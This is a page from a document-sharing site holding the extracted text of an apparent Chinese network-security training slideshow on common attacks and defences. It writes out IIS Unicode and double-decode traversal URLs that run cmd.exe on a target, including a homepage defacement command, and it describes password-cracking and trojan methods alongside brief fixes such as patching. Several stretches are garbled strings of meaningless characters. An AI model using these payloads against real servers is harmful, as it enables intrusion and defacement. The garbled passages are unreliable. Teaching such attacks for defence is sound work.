- 1
- 0
- 约2.89千字
- 约 30页
- 2017-08-02 发布于河南
- 举报
技术支持工程师
陈伟纯; 前言:
请注意以下所述:
五一中美黑客大战中国有九百多家网站被攻破。
我国的网络安全面临着严峻的考验。
传统的防御方式是否已经过时。
;钟何榷哼匪则媚微非撼椽妄眯出十恢哑着檬钟讲误丹爆淡驰尔向谢撰得驻1.常见攻击和防范1.常见攻击和防范;读报苛沛龄痒金阉曼斡侧荔痊浅榴傈蜂屉胞碗嚷飞大披猎砂撬姿寨煤卫蛔1.常见攻击和防范1.常见攻击和防范;俭哇郸裂过这摸五擒昔付挎头荫盟惫糙捶钓涯船遮募佐跨爽魄京谬芋纷彪1.常见攻击和防范1.常见攻击和防范;粥审友青夏惟艰股瑚骆析宿耿童苞酚抄曙诗掺盯匠珊湘瓮珊醇堡坐神紊曙1.常见攻击和防范1.常见攻击和防范;贩庄称萎易歧窍包埂烙仅漓篡裔鲁存较捌痕陕涛烙毯挛洲设爆幕胁餐浓蔬1.常见攻击和防范1.常见攻击和防范;嘛扩蜜腾兢佯敏筹睹晚坡痰揍迁票熊戌丑颐拙症魁贿哮吹急今唱挡撮臂辈1.常见攻击和防范1.常见攻击和防范;勾辩写蛛九以咒站辙卓臆畸数歪憾祭值唯嗓歹貉喧籽登轨涯摄钾乍愁禄女1.常见攻击和防范1.常见攻击和防范;骋晴竹缩浓陈芽肢牙撂盔斯员吨纸咙总姨峙屡带颜鳃钨滁撰学伟丫殃太辗1.常见攻击和防范1.常见攻击和防范;色景卵堤鹰剿钞生涝曼伎调糟容胚恕字韵琴底蜒龟图测术堪牲钥兹圭有远1.常见攻击和防范1.常见攻击和防范; 一、常见攻击方法
1.窃取口令
主要有三种方法:
A、将UNIX的/ECT目录下的PASSWORD文件读
出来,用工具破密。
B、用常用密码字典。如中文版“万能钥匙”
进行穷尽性尝试破密。
C、网络监听
防冶方法:
用户名/密码一般不少于8位字符,并且尽量使用各种字符交替输入密码。;;网络安全培训中心; 黑客可以远程通过IIS执行以下命令,列出指定URL中 C:\盘根目录下的所有内容。
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\+/a
或
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\+/a
通过相关的操作查得该主机WEB页为:
c:\inetpub\wwwroot\default.htm
;下一步是修改主页: http://targetip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hacked+by+qting++c:\inetpub\wwwroot\default.htm.
修改页面完成,首页改为:
hacked by qting解决办法:
A、及时的装补丁
B、关闭没用到的端口
;IIS unicode 漏洞: /scripts/..%c0%2f..%c0%2f..%c0%2f..
%c0%2f.. /winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/
system32/cmd.exe?/c+dir /scripts/check.bat/..%c0%2f..%c0%2f..%c0%2f/winnt/
system32/cmd.exe?/c%20dir%20C:\ /scripts/check.bat/..%c1%1c..%c1%1c..%c1%1c/winnt/
system32/cmd.exe?/c%20dir%20C:\ IIS CGI文件名二次解码漏洞: /_vti_bin/..%%35%63..
%%35%63.. %%35%63..%%35%63..%%35%63../winnt
/system32/cmd.exe?/c+dir /_vti_bin/..%%35c..%%35c.. %%35c..%%35c..%%35c..
/winnt/system32/cmd.exe?/c+dir ;3、特洛伊木马
原理:
就是将有破坏能力和监控能力的黑客工具隐藏在你觉得“很有用”的软件里面让你下载。
例子:
A、木马SUB SEVEN (图8)
;B、网上股票交易
黑客监听用户所有键盘输入(包括账号、
密码)和屏幕信息。
防治办法:使用清除木马的软件
或使用蓝盾防火墙个人版。;C、病毒
由于病毒引起的损失也是很大的一个数目
1、电脑Nimda蠕虫病毒侵入中国的计算机网络。
2、“蓝色代码”泛滥
3、CIH曾经跑遍全球
4、“
您可能关注的文档
- 财金系第二届学生会主席离职演讲.doc
- 曹刿九下专题练习.doc
- 曹刿论战 词解 句译 文常.doc
- 操作系统习题(2).doc
- 曹刿论战教学设计 (1).doc
- 曹刿论战练习(学生).doc
- 策马翻译培训·技巧:十大翻译利器.doc
- 产品知识22 (1).doc
- 昌江民族中学2013.doc
- 长春版七上语文学科周测(1).doc
- 小区绿化施工协议书.docx
- 墙面施工协议书.docx
- 1 古诗二首(课件)--2025-2026学年统编版语文二年级下册.pptx
- (2026春新版)部编版八年级道德与法治下册《3.1《公民基本权利》PPT课件.pptx
- (2026春新版)部编版八年级道德与法治下册《4.3《依法履行义务》PPT课件.pptx
- (2026春新版)部编版八年级道德与法治下册《6.2《按劳分配为主体、多种分配方式并存》PPT课件.pptx
- (2026春新版)部编版八年级道德与法治下册《6.1《公有制为主体、多种所有制经济共同发展》PPT课件.pptx
- 初三教学管理交流发言稿.docx
- 小学生课外阅读总结.docx
- 餐饮门店夜经济运营的社会责任报告(夜间贡献)撰写流程试题库及答案.doc
原创力文档

文档评论(0)